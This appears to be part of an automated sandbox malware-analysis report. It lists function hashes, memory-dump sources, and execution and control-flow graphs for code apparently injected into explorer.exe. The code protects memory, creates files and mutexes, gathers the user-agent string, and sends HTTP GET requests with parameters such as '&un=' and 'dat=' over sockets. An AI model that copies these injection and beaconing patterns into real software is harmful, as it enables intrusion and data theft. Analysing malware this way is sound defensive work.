• Instruction ID: 6a2dcc4e5ac5259c40fe7e7760ee13b4ecbc7d0edbea874ef36f028d1c092559
• Opcode Fuzzy Hash: 50d56dae303784b0b1b2fa34b98b54d96a4216e3d2055f9ec06f26be768cb466
• Instruction Fuzzy Hash: E041D570A04205AFD724EBA8CC85FBB77A9EF49720F248609F9559B2C1D734E9418B70
APIs
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: __fassign
• String ID:
• API String ID: 3965848254-0
• Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction ID: 4c849bf8a8d8c4f9493bea30df75ce562241401910e736daeb16ede34523b698
• Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction Fuzzy Hash: E2917E71D0420AEBDF24DF98C845AEEB7B4EF55315F28807AE451E71A2E7309A41CBB1
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: __aulldvrm
• String ID: $$0
• API String ID: 1302938615-389342756
• Opcode ID: bd7b6151f8803b91c489f00b9c211ecce3a41b9a7e270e2f9bc1f781265c2d88
• Instruction ID: 5bc71b3ef7b4128e3e8330158209cffd3c39ea3dd0bfb2012ee7b34d770bc87e
• Opcode Fuzzy Hash: bd7b6151f8803b91c489f00b9c211ecce3a41b9a7e270e2f9bc1f781265c2d88
• Instruction Fuzzy Hash: 7591B032D04A8ADFDF24CFA9D8453EEBBB1AF85314F14665AD4A1B7291C3744AC2CB50
APIs
  • Part of subcall function 00D9FED6: ___swprintf_l.LIBCMT ref: 00D9FEFD
• ___swprintf_l.LIBCMT ref: 00DCEA87
Strings
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: Rw$:%u
• API String ID: 48624451-2046040389
• Opcode ID: 53069e3b7901a03454950369296c19e662c142e46ed0272fa57d5454ba1c5f90
• Instruction ID: aec75a1bf031527e0b8b7065a6ec90293cba3a79b4a70ffb37eababfd009a452
• Opcode Fuzzy Hash: 53069e3b7901a03454950369296c19e662c142e46ed0272fa57d5454ba1c5f90
• Instruction Fuzzy Hash: 4411B17250021AABCF10EFA9C8409BBB7ACEB54710B54452AF845D3142EB30E9058BB0
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
• Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: Rw$:%u
• API String ID: 48624451-2046040389
• Opcode ID: 9c30df321e2c8aeb6f9811bb0974b653a6d20e29fa7319775970dd75286aecb7
• Instruction ID: 480604fdfe13a3588c8e3feca522b477cb1ee1416c0e69bb6a1069dcbc462d08
• Opcode Fuzzy Hash: 9c30df321e2c8aeb6f9811bb0974b653a6d20e29fa7319775970dd75286aecb7
• Instruction Fuzzy Hash: 29119876E0020AAFCB20EF75C8419FBB3FCEBA4714B105529F955E7141EA34DA85C760

Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.7%
Total number of Nodes: 444
Total number of Limit Nodes: 16
                                                                                                                                                                                    execution_graph 13858 8cdfa4d 13859 8cdfa53 13858->13859 13862 8cd3782 13859->13862 13861 8cdfa6b 13864 8cd378f 13862->13864 13863 8cd37ad 13863->13861 13864->13863 13866 8cd8662 13864->13866 13867 8cd866b 13866->13867 13874 8cd87ba 13866->13874 13868 8cd20f2 6 API calls 13867->13868 13867->13874 13871 8cd86ee 13868->13871 13869 8cd8750 13870 8cd8791 13869->13870 13873 8cd883f 13869->13873 13869->13874 13870->13874 13876 8cddf82 6 API calls 13870->13876 13871->13869 13872 8cddf82 6 API calls 13871->13872 13872->13869 13873->13874 13875 8cddf82 6 API calls 13873->13875 13874->13863 13875->13874 13876->13874 13877 8cdee0a 13878 8cdd942 13877->13878 13879 8cdee45 NtProtectVirtualMemory 13878->13879 13880 8cdee70 13879->13880 13958 8cd714a 13959 8cd7153 13958->13959 13964 8cd7174 13958->13964 13961 8cd9382 ObtainUserAgentString 13959->13961 13960 8cd71e7 13962 8cd716c 13961->13962 13963 8cd20f2 6 API calls 13962->13963 13963->13964 13964->13960 13966 8cd21f2 13964->13966 13967 8cd220f 13966->13967 13968 8cd22c9 13966->13968 13969 8cdcf12 7 API calls 13967->13969 13971 8cd2242 13967->13971 13968->13964 13969->13971 13970 8cd2289 13970->13968 13972 8cd20f2 6 API calls 13970->13972 13971->13970 13973 8cd3432 NtCreateFile 13971->13973 13972->13968 13973->13970 13754 8cddf82 13755 8cddfb8 13754->13755 13756 8cda5b2 socket 13755->13756 13757 8cde081 13755->13757 13765 8cde022 13755->13765 13756->13757 13758 8cde134 13757->13758 13760 8cde117 getaddrinfo 13757->13760 13757->13765 13759 8cda732 connect 13758->13759 13764 8cde1b2 13758->13764 13758->13765 13759->13764 13760->13758 13761 8cda6b2 send 13763 8cde729 13761->13763 13762 8cde7f4 setsockopt recv 13762->13765 13763->13762 13763->13765 13764->13761 13764->13765 13503 8cd22dd 13504 8cd231a 13503->13504 13505 8cd23fa 13504->13505 13506 8cd2328 
SleepEx 13504->13506 13510 8cdcf12 13504->13510 13519 8cd3432 13504->13519 13529 8cd20f2 13504->13529 13506->13504 13506->13506 13514 8cdcf48 13510->13514 13511 8cdd232 NtCreateFile 13511->13514 13512 8cdd125 13555 8cdc922 13512->13555 13514->13511 13517 8cdd0e9 13514->13517 13518 8cdd134 13514->13518 13535 8cddf82 13514->13535 13517->13512 13547 8cdc842 13517->13547 13518->13504 13520 8cd345b 13519->13520 13528 8cd34c9 13519->13528 13521 8cdd232 NtCreateFile 13520->13521 13520->13528 13522 8cd3496 13521->13522 13523 8cd34c5 13522->13523 13576 8cd3082 13522->13576 13524 8cdd232 NtCreateFile 13523->13524 13523->13528 13524->13528 13526 8cd34b6 13526->13523 13585 8cd2f52 13526->13585 13528->13504 13530 8cd21d3 13529->13530 13531 8cd2109 13529->13531 13530->13504 13590 8cd2012 13531->13590 13533 8cd2113 13533->13530 13534 8cddf82 6 API calls 13533->13534 13534->13530 13536 8cddfb8 13535->13536 13538 8cde081 13536->13538 13546 8cde022 13536->13546 13563 8cda5b2 13536->13563 13539 8cde134 13538->13539 13541 8cde117 getaddrinfo 13538->13541 13538->13546 13545 8cde1b2 13539->13545 13539->13546 13566 8cda732 13539->13566 13541->13539 13543 8cde7f4 setsockopt recv 13543->13546 13544 8cde729 13544->13543 13544->13546 13545->13546 13569 8cda6b2 13545->13569 13546->13514 13548 8cdc86d 13547->13548 13572 8cdd232 13548->13572 13550 8cdc906 13550->13517 13551 8cdc888 13551->13550 13552 8cddf82 6 API calls 13551->13552 13553 8cdc8c5 13551->13553 13552->13553 13553->13550 13554 8cdd232 NtCreateFile 13553->13554 13554->13550 13556 8cdc9c2 13555->13556 13557 8cdd232 NtCreateFile 13556->13557 13559 8cdc9d6 13557->13559 13558 8cdca9f 13558->13518 13559->13558 13560 8cdca5d 13559->13560 13562 8cddf82 6 API calls 13559->13562 13560->13558 13561 8cdd232 NtCreateFile 13560->13561 13561->13558 13562->13560 13564 8cda5ec 13563->13564 13565 8cda60a socket 13563->13565 13564->13565 13565->13538 13567 8cda788 connect 13566->13567 13568 8cda76a 13566->13568 13567->13545 13568->13567 13570 
8cda705 send 13569->13570 13571 8cda6e7 13569->13571 13570->13544 13571->13570 13574 8cdd25c 13572->13574 13575 8cdd334 13572->13575 13573 8cdd410 NtCreateFile 13573->13575 13574->13573 13574->13575 13575->13551 13577 8cd3420 13576->13577 13578 8cd30aa 13576->13578 13577->13526 13578->13577 13579 8cdd232 NtCreateFile 13578->13579 13581 8cd31f9 13579->13581 13580 8cd33df 13580->13526 13581->13580 13582 8cdd232 NtCreateFile 13581->13582 13583 8cd33c9 13582->13583 13584 8cdd232 NtCreateFile 13583->13584 13584->13580 13586 8cd2f70 13585->13586 13587 8cd2f84 13585->13587 13586->13523 13588 8cdd232 NtCreateFile 13587->13588 13589 8cd3046 13588->13589 13589->13523 13591 8cd2031 13590->13591 13592 8cd20cd 13591->13592 13593 8cddf82 6 API calls 13591->13593 13592->13533 13593->13592 13766 8cd5edd 13768 8cd5f06 13766->13768 13767 8cd5fa4 13768->13767 13769 8cd28f2 NtProtectVirtualMemory 13768->13769 13770 8cd5f9c 13769->13770 13771 8cd9382 ObtainUserAgentString 13770->13771 13771->13767 13881 8cdfa1f 13882 8cdfa25 13881->13882 13885 8cd35f2 13882->13885 13884 8cdfa3d 13886 8cd360e 13885->13886 13887 8cd35fb 13885->13887 13886->13884 13887->13886 13888 8cd8662 6 API calls 13887->13888 13888->13886 13913 8cd5dd9 13915 8cd5df0 13913->13915 13914 8cd5ecd 13915->13914 13916 8cd9382 ObtainUserAgentString 13915->13916 13916->13914 13772 8cd7cd4 13774 8cd7cd8 13772->13774 13773 8cd8022 13774->13773 13778 8cd7352 13774->13778 13776 8cd7f0d 13776->13773 13787 8cd7792 13776->13787 13779 8cd739e 13778->13779 13780 8cd74ec 13779->13780 13781 8cd758e 13779->13781 13783 8cd7595 13779->13783 13782 8cdd232 NtCreateFile 13780->13782 13781->13776 13785 8cd74ff 13782->13785 13783->13781 13784 8cdd232 NtCreateFile 13783->13784 13784->13781 13785->13781 13786 8cdd232 NtCreateFile 13785->13786 13786->13781 13788 8cd77e0 13787->13788 13789 8cdd232 NtCreateFile 13788->13789 13791 8cd790c 13789->13791 13790 8cd7af3 13790->13776 13791->13790 13792 8cd7352 NtCreateFile 13791->13792 13793 8cd7602 
NtCreateFile 13791->13793 13792->13791 13793->13791 13889 8cd3613 13890 8cd3620 13889->13890 13891 8cd3684 13890->13891 13892 8cdee12 NtProtectVirtualMemory 13890->13892 13892->13890 13746 8cdee12 13747 8cdee45 NtProtectVirtualMemory 13746->13747 13748 8cdd942 13746->13748 13749 8cdee70 13747->13749 13748->13747 13594 8cdebac 13595 8cdebb1 13594->13595 13628 8cdebb6 13595->13628 13629 8cd4b72 13595->13629 13597 8cdec2c 13598 8cdec85 13597->13598 13600 8cdec69 13597->13600 13601 8cdec54 13597->13601 13597->13628 13599 8cdcab2 NtProtectVirtualMemory 13598->13599 13604 8cdec8d 13599->13604 13602 8cdec6e 13600->13602 13603 8cdec80 13600->13603 13605 8cdcab2 NtProtectVirtualMemory 13601->13605 13606 8cdcab2 NtProtectVirtualMemory 13602->13606 13603->13598 13607 8cdec97 13603->13607 13665 8cd6102 13604->13665 13609 8cdec5c 13605->13609 13610 8cdec76 13606->13610 13611 8cdec9c 13607->13611 13612 8cdecbe 13607->13612 13651 8cd5ee2 13609->13651 13657 8cd5fc2 13610->13657 13633 8cdcab2 13611->13633 13615 8cdecd9 13612->13615 13616 8cdecc7 13612->13616 13612->13628 13621 8cdcab2 NtProtectVirtualMemory 13615->13621 13615->13628 13618 8cdcab2 NtProtectVirtualMemory 13616->13618 13620 8cdeccf 13618->13620 13675 8cd62f2 13620->13675 13622 8cdece5 13621->13622 13693 8cd6712 13622->13693 13631 8cd4b93 13629->13631 13630 8cd4cce 13630->13597 13631->13630 13632 8cd4cb5 CreateMutexExW 13631->13632 13632->13630 13634 8cdcadf 13633->13634 13642 8cdcebc 13634->13642 13705 8cd28f2 13634->13705 13636 8cdce5c 13637 8cd28f2 NtProtectVirtualMemory 13636->13637 13638 8cdce7c 13637->13638 13639 8cd28f2 NtProtectVirtualMemory 13638->13639 13640 8cdce9c 13639->13640 13641 8cd28f2 NtProtectVirtualMemory 13640->13641 13641->13642 13643 8cd5de2 13642->13643 13644 8cd5df0 13643->13644 13646 8cd5ecd 13644->13646 13730 8cd9382 13644->13730 13647 8cd2412 13646->13647 13649 8cd2440 13647->13649 13648 8cd2473 13648->13628 13649->13648 13650 8cd244d CreateThread 13649->13650 13650->13628 13653 8cd5f06 
13651->13653 13652 8cd5fa4 13652->13628 13653->13652 13654 8cd28f2 NtProtectVirtualMemory 13653->13654 13655 8cd5f9c 13654->13655 13656 8cd9382 ObtainUserAgentString 13655->13656 13656->13652 13659 8cd6016 13657->13659 13658 8cd60f0 13658->13628 13659->13658 13662 8cd28f2 NtProtectVirtualMemory 13659->13662 13663 8cd60bb 13659->13663 13660 8cd60e8 13661 8cd9382 ObtainUserAgentString 13660->13661 13661->13658 13662->13663 13663->13660 13664 8cd28f2 NtProtectVirtualMemory 13663->13664 13664->13660 13667 8cd6137 13665->13667 13666 8cd62d5 13666->13628 13667->13666 13668 8cd28f2 NtProtectVirtualMemory 13667->13668 13669 8cd628a 13668->13669 13670 8cd28f2 NtProtectVirtualMemory 13669->13670 13673 8cd62a9 13670->13673 13671 8cd62cd 13672 8cd9382 ObtainUserAgentString 13671->13672 13672->13666 13673->13671 13674 8cd28f2 NtProtectVirtualMemory 13673->13674 13674->13671 13676 8cd6349 13675->13676 13677 8cd649f 13676->13677 13679 8cd28f2 NtProtectVirtualMemory 13676->13679 13678 8cd28f2 NtProtectVirtualMemory 13677->13678 13682 8cd64c3 13677->13682 13678->13682 13680 8cd6480 13679->13680 13681 8cd28f2 NtProtectVirtualMemory 13680->13681 13681->13677 13683 8cd28f2 NtProtectVirtualMemory 13682->13683 13684 8cd6597 13682->13684 13683->13684 13685 8cd28f2 NtProtectVirtualMemory 13684->13685 13686 8cd65bf 13684->13686 13685->13686 13687 8cd66b9 13686->13687 13690 8cd28f2 NtProtectVirtualMemory 13686->13690 13688 8cd66e1 13687->13688 13692 8cd28f2 NtProtectVirtualMemory 13687->13692 13689 8cd9382 ObtainUserAgentString 13688->13689 13691 8cd66e9 13689->13691 13690->13687 13691->13628 13692->13688 13694 8cd6767 13693->13694 13695 8cd28f2 NtProtectVirtualMemory 13694->13695 13700 8cd6903 13694->13700 13696 8cd68e3 13695->13696 13697 8cd28f2 NtProtectVirtualMemory 13696->13697 13697->13700 13698 8cd69b7 13699 8cd9382 ObtainUserAgentString 13698->13699 13702 8cd69bf 13699->13702 13701 8cd6992 13700->13701 13703 8cd28f2 NtProtectVirtualMemory 13700->13703 13701->13698 13704 8cd28f2 
NtProtectVirtualMemory 13701->13704 13702->13628 13703->13701 13704->13698 13706 8cd2987 13705->13706 13709 8cd29b2 13706->13709 13720 8cd3622 13706->13720 13708 8cd2c0c 13708->13636 13709->13708 13710 8cd2ba2 13709->13710 13712 8cd2ac5 13709->13712 13711 8cdee12 NtProtectVirtualMemory 13710->13711 13719 8cd2b5b 13711->13719 13724 8cdee12 13712->13724 13714 8cdee12 NtProtectVirtualMemory 13714->13708 13715 8cd2ae3 13715->13708 13716 8cd2b3d 13715->13716 13717 8cdee12 NtProtectVirtualMemory 13715->13717 13718 8cdee12 NtProtectVirtualMemory 13716->13718 13717->13716 13718->13719 13719->13708 13719->13714 13722 8cd367a 13720->13722 13721 8cd3684 13721->13709 13722->13721 13723 8cdee12 NtProtectVirtualMemory 13722->13723 13723->13722 13725 8cdee45 NtProtectVirtualMemory 13724->13725 13728 8cdd942 13724->13728 13727 8cdee70 13725->13727 13727->13715 13729 8cdd967 13728->13729 13729->13725 13731 8cd93c7 13730->13731 13734 8cd9232 13731->13734 13733 8cd9438 13733->13646 13735 8cd925e 13734->13735 13738 8cd88c2 13735->13738 13737 8cd926b 13737->13733 13739 8cd8934 13738->13739 13740 8cd89a6 13739->13740 13741 8cd8995 ObtainUserAgentString 13739->13741 13740->13737 13741->13740 13893 8cd342e 13894 8cd345b 13893->13894 13902 8cd34c9 13893->13902 13895 8cdd232 NtCreateFile 13894->13895 13894->13902 13896 8cd3496 13895->13896 13898 8cd3082 NtCreateFile 13896->13898 13901 8cd34c5 13896->13901 13897 8cdd232 NtCreateFile 13897->13902 13899 8cd34b6 13898->13899 13900 8cd2f52 NtCreateFile 13899->13900 13899->13901 13900->13901 13901->13897 13901->13902 13994 8cda72e 13995 8cda788 connect 13994->13995 13996 8cda76a 13994->13996 13996->13995 13842 8cdfaa9 13843 8cdfaaf 13842->13843 13846 8cda212 13843->13846 13845 8cdfac7 13847 8cda21b 13846->13847 13848 8cda237 13846->13848 13847->13848 13849 8cda0c2 6 API calls 13847->13849 13848->13845 13849->13848 13903 8cd922a 13904 8cd925e 13903->13904 13905 8cd88c2 ObtainUserAgentString 13904->13905 13906 8cd926b 13905->13906 13794 8cda2e4 
13795 8cda36f 13794->13795 13796 8cda305 13794->13796 13796->13795 13798 8cda0c2 13796->13798 13799 8cda0cb 13798->13799 13801 8cda1f0 13798->13801 13800 8cddf82 6 API calls 13799->13800 13799->13801 13800->13801 13801->13795 13974 8cd4b66 13976 8cd4b6a 13974->13976 13975 8cd4cce 13976->13975 13977 8cd4cb5 CreateMutexExW 13976->13977 13977->13975 13802 8cd7ce2 13804 8cd7dd9 13802->13804 13803 8cd8022 13804->13803 13805 8cd7352 NtCreateFile 13804->13805 13806 8cd7f0d 13805->13806 13806->13803 13807 8cd7792 NtCreateFile 13806->13807 13807->13806 13933 8cd5fbf 13934 8cd6016 13933->13934 13937 8cd60f0 13934->13937 13938 8cd28f2 NtProtectVirtualMemory 13934->13938 13939 8cd60bb 13934->13939 13935 8cd60e8 13936 8cd9382 ObtainUserAgentString 13935->13936 13936->13937 13938->13939 13939->13935 13940 8cd28f2 NtProtectVirtualMemory 13939->13940 13940->13935 13850 8cd88be 13852 8cd88c3 13850->13852 13851 8cd89a6 13852->13851 13853 8cd8995 ObtainUserAgentString 13852->13853 13853->13851 13854 8cda0b9 13855 8cda1f0 13854->13855 13856 8cda0ed 13854->13856 13856->13855 13857 8cddf82 6 API calls 13856->13857 13857->13855 13808 8cd60fb 13810 8cd6137 13808->13810 13809 8cd62d5 13810->13809 13811 8cd28f2 NtProtectVirtualMemory 13810->13811 13812 8cd628a 13811->13812 13813 8cd28f2 NtProtectVirtualMemory 13812->13813 13816 8cd62a9 13813->13816 13814 8cd62cd 13815 8cd9382 ObtainUserAgentString 13814->13815 13815->13809 13816->13814 13817 8cd28f2 NtProtectVirtualMemory 13816->13817 13817->13814 13907 8cdc83a 13908 8cdc841 13907->13908 13909 8cddf82 6 API calls 13908->13909 13911 8cdc8c5 13909->13911 13910 8cdc906 13911->13910 13912 8cdd232 NtCreateFile 13911->13912 13912->13910 13982 8cddf7a 13983 8cddfb8 13982->13983 13984 8cda5b2 socket 13983->13984 13985 8cde081 13983->13985 13993 8cde022 13983->13993 13984->13985 13986 8cde134 13985->13986 13988 8cde117 getaddrinfo 13985->13988 13985->13993 13987 8cda732 connect 13986->13987 13992 8cde1b2 13986->13992 13986->13993 13987->13992 
13988->13986 13989 8cda6b2 send 13991 8cde729 13989->13991 13990 8cde7f4 setsockopt recv 13990->13993 13991->13990 13991->13993 13992->13989 13992->13993 13818 8cd62f4 13819 8cd6349 13818->13819 13820 8cd649f 13819->13820 13822 8cd28f2 NtProtectVirtualMemory 13819->13822 13821 8cd28f2 NtProtectVirtualMemory 13820->13821 13825 8cd64c3 13820->13825 13821->13825 13823 8cd6480 13822->13823 13824 8cd28f2 NtProtectVirtualMemory 13823->13824 13824->13820 13826 8cd28f2 NtProtectVirtualMemory 13825->13826 13827 8cd6597 13825->13827 13826->13827 13828 8cd28f2 NtProtectVirtualMemory 13827->13828 13830 8cd65bf 13827->13830 13828->13830 13829 8cd66e1 13831 8cd9382 ObtainUserAgentString 13829->13831 13832 8cd28f2 NtProtectVirtualMemory 13830->13832 13833 8cd66b9 13830->13833 13834 8cd66e9 13831->13834 13832->13833 13833->13829 13835 8cd28f2 NtProtectVirtualMemory 13833->13835 13835->13829 13836 8cd20f1 13837 8cd21d3 13836->13837 13838 8cd2109 13836->13838 13839 8cd2012 6 API calls 13838->13839 13840 8cd2113 13839->13840 13840->13837 13841 8cddf82 6 API calls 13840->13841 13841->13837 13917 8cd35f1 13918 8cd360e 13917->13918 13919 8cd3606 13917->13919 13920 8cd8662 6 API calls 13919->13920 13920->13918 13921 8cdf9f1 13922 8cdf9f7 13921->13922 13925 8cd4852 13922->13925 13924 8cdfa0f 13926 8cd4865 13925->13926 13927 8cd48e4 13925->13927 13926->13927 13929 8cd4887 13926->13929 13931 8cd487e 13926->13931 13927->13924 13928 8cda36f 13928->13924 13929->13927 13930 8cd8662 6 API calls 13929->13930 13930->13927 13931->13928 13932 8cda0c2 6 API calls 13931->13932 13932->13928 13941 8cdf9b3 13942 8cdf9bd 13941->13942 13945 8cd46d2 13942->13945 13944 8cdf9e0 13946 8cd4704 13945->13946 13947 8cd46f7 13945->13947 13949 8cd46ff 13946->13949 13950 8cd472d 13946->13950 13952 8cd4737 13946->13952 13948 8cd20f2 6 API calls 13947->13948 13948->13949 13949->13944 13954 8cda2c2 13950->13954 13952->13949 13953 8cddf82 6 API calls 13952->13953 13953->13949 13955 8cda2df 13954->13955 13956 8cda2cb 
13954->13956 13955->13949 13956->13955 13957 8cda0c2 6 API calls 13956->13957 13957->13955 13750 8cdd232 13752 8cdd25c 13750->13752 13753 8cdd334 13750->13753 13751 8cdd410 NtCreateFile 13751->13753 13752->13751 13752->13753

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 8cddf82-8cddfb6 1 8cddfb8-8cddfbc 0->1 2 8cddfd6-8cddfd9 0->2 1->2 3 8cddfbe-8cddfc2 1->3 4 8cddfdf-8cddfed 2->4 5 8cde8fe-8cde90c 2->5 3->2 6 8cddfc4-8cddfc8 3->6 7 8cde8f6-8cde8f7 4->7 8 8cddff3-8cddff7 4->8 6->2 11 8cddfca-8cddfce 6->11 7->5 9 8cddfff-8cde000 8->9 10 8cddff9-8cddffd 8->10 12 8cde00a-8cde010 9->12 10->9 10->12 11->2 13 8cddfd0-8cddfd4 11->13 14 8cde03a-8cde060 12->14 15 8cde012-8cde020 12->15 13->2 13->4 17 8cde068-8cde07c call 8cda5b2 14->17 18 8cde062-8cde066 14->18 15->14 16 8cde022-8cde026 15->16 16->7 19 8cde02c-8cde035 16->19 22 8cde081-8cde0a2 17->22 18->17 20 8cde0a8-8cde0ab 18->20 19->7 23 8cde144-8cde150 20->23 24 8cde0b1-8cde0b8 20->24 22->20 25 8cde8ee-8cde8ef 22->25 23->25 26 8cde156-8cde165 23->26 27 8cde0ba-8cde0dc call 8cdd942 24->27 28 8cde0e2-8cde0f5 24->28 25->7 30 8cde17f-8cde18f 26->30 31 8cde167-8cde178 call 8cda552 26->31 27->28 28->25 29 8cde0fb-8cde101 28->29 29->25 33 8cde107-8cde109 29->33 35 8cde1e5-8cde21b 30->35 36 8cde191-8cde1ad call 8cda732 30->36 31->30 33->25 40 8cde10f-8cde111 33->40 38 8cde22d-8cde231 35->38 39 8cde21d-8cde22b 35->39 47 8cde1b2-8cde1da 36->47 44 8cde247-8cde24b 38->44 45 8cde233-8cde245 38->45 43 8cde27f-8cde280 39->43 40->25 46 8cde117-8cde132 getaddrinfo 40->46 51 8cde283-8cde2e0 call 8cded62 call 8cdb482 call 8cdae72 call 8cdf002 43->51 48 8cde24d-8cde25f 44->48 49 8cde261-8cde265 44->49 45->43 46->23 50 8cde134-8cde13c 46->50 47->35 52 8cde1dc-8cde1e1 47->52 48->43 53 8cde26d-8cde279 49->53 54 8cde267-8cde26b 49->54 50->23 63 8cde2f4-8cde354 call 8cded92 51->63 64 8cde2e2-8cde2e6 51->64 52->35 53->43 54->51 54->53 69 8cde48c-8cde4b8 call 8cded62 call 8cdf262 63->69 70 8cde35a-8cde396 call 8cded62 call 8cdf262 call 8cdf002 63->70 64->63 65 8cde2e8-8cde2ef call 8cdb042 64->65 65->63 79
8cde4d9-8cde590 call 8cdf262 * 3 call 8cdf002 * 2 call 8cdb482 69->79 80 8cde4ba-8cde4d5 69->80 84 8cde398-8cde3b7 call 8cdf262 call 8cdf002 70->84 85 8cde3bb-8cde3e9 call 8cdf262 * 2 70->85 110 8cde595-8cde5b9 call 8cdf262 79->110 80->79 84->85 101 8cde3eb-8cde410 call 8cdf002 call 8cdf262 85->101 102 8cde415-8cde41d 85->102 101->102 105 8cde41f-8cde425 102->105 106 8cde442-8cde448 102->106 107 8cde467-8cde487 call 8cdf262 105->107 108 8cde427-8cde43d 105->108 109 8cde44e-8cde456 106->109 106->110 107->110 108->110 109->110 113 8cde45c-8cde45d 109->113 120 8cde5bb-8cde5cc call 8cdf262 call 8cdf002 110->120 121 8cde5d1-8cde6ad call 8cdf262 * 7 call 8cdf002 call 8cded62 call 8cdf002 call 8cdae72 call 8cdb042 110->121 113->107 132 8cde6af-8cde6b3 120->132 121->132 135 8cde6ff-8cde72d call 8cda6b2 132->135 136 8cde6b5-8cde6fa call 8cda382 call 8cda7b2 132->136 144 8cde75d-8cde761 135->144 145 8cde72f-8cde735 135->145 153 8cde8e6-8cde8e7 136->153 149 8cde90d-8cde913 144->149 150 8cde767-8cde76b 144->150 145->144 148 8cde737-8cde74c 145->148 148->144 154 8cde74e-8cde754 148->154 155 8cde779-8cde784 149->155 156 8cde919-8cde920 149->156 157 8cde8aa-8cde8df call 8cda7b2 150->157 158 8cde771-8cde773 150->158 153->25 154->144 163 8cde756 154->163 159 8cde795-8cde796 155->159 160 8cde786-8cde793 155->160 156->160 157->153 158->155 158->157 164 8cde79c-8cde7a0 159->164 160->159 160->164 163->144 167 8cde7b1-8cde7b2 164->167 168 8cde7a2-8cde7af 164->168 170 8cde7b8-8cde7c4 167->170 168->167 168->170 173 8cde7f4-8cde861 setsockopt recv 170->173 174 8cde7c6-8cde7ef call 8cded92 call 8cded62 170->174 177 8cde8a3-8cde8a4 173->177 178 8cde863 173->178 174->173 177->157 178->177 181 8cde865-8cde86a 178->181 181->177 184 8cde86c-8cde872 181->184 184->177 186 8cde874-8cde8a1 184->186 186->177 186->178
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
Similarity
• API ID: getaddrinforecvsetsockopt
• String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
• API String ID: 1564272048-1117930895
• Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction ID: 123b144f33fc621204de8d67ec8f008424b6959888652af1e279348eeb709c89
• Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
• Instruction Fuzzy Hash: A4525C34614B088BDB69FF68D4847E9B7F1FB54301F50462ED5ABCB246EE30A54ACB81
